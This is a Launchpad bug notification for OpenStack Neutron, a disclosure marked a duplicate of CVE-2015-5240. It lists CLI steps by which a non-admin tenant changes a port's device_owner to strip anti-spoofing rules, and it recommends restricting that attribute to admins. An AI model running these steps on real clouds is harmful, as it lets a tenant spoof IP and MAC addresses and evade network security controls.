*** This bug is a duplicate of bug 1489111 ***
https://bugs.launchpad.net/bugs/1489111
Thanks for filing this. This was actually a vulnerability fixed later in
bug 1489111. I think the part that was overlooked was that this could be
done on shared networks.
** This bug has been marked a duplicate of bug 1489111
[OSSA 2015-018] IP, MAC, and DHCP spoofing rules can by bypassed by changing
device_owner (CVE-2015-5240)
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1417791
Title:
Neutron allows non-admin user to circumvent port security via port-
update device_owner
Status in neutron:
New
Status in OpenStack Security Advisory:
Won't Fix
Bug description:
Neutron allows a non-admin tenant to circumvent and spoofing port
security by updating the device-owner to 'network:None' and rebooting
the instance.
How to reproduce:
1. Create a new tenant: `keystone tenant-create --name demo --enable=true`
2. Create a new user in that tenant: `keystone user-create --name demo
--tenant $TENANT_ID --pass $PASSWORD --enabled true`
3. Switch to that new user: `export OS_USERNAME=demo; export
OS_TENANT_NAME=demo; export OS_PASSWORD=$PASSWORD`
4. Create a keypair: `nova keypair-add demo-key --pub-key
~/.ssh/authorized_keys`
5. Create a security group: `neutron security-group-create demo-secgroup`
6. Add a permit rule to that secuirty group: `neutron
security-group-rule-create demo-secgroup --remote-ip-prefix 0.0.0.0/0`
7. Deploy a new instance: `nova boot --flavor m1.tiny --image ubuntu-14.04
--nic net-id=$NETWORK_ID --key-name demo-key --security-groups demo-secgroup
--poll demo-instance`
8. Find the instance's neutron port: `neutron port-list`
9. Update neutron port device owner: `neutron port-update $PORT_ID
--device_owner network:None`
10. Verify neutron port device owner updated: `neutron port-show $PORT_ID`
11. Reboot instance: `nova reboot $INSTANCE_ID`
When the instance comes back up, it will not have anti-spoofing port
security rules present and can source traffic from any IP and MAC
combination.
It doesn't appear like this was intended, in Juno the stock
neutron/policy.conf includes:
```
"update_port": "rule:admin_or_owner",
"update_port:port_security_enabled": "rule:admin_or_network_owner",
```
But the port owner is permitted to modify the device-owner attribute
of the port which allows circumventing the port security.
I would recommend protecting the device_owner and device_id port
attributes so they can only be modified by an admin user.
To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1417791/+subscriptions
--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : [email protected]
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help : https://help.launchpad.net/ListHelp
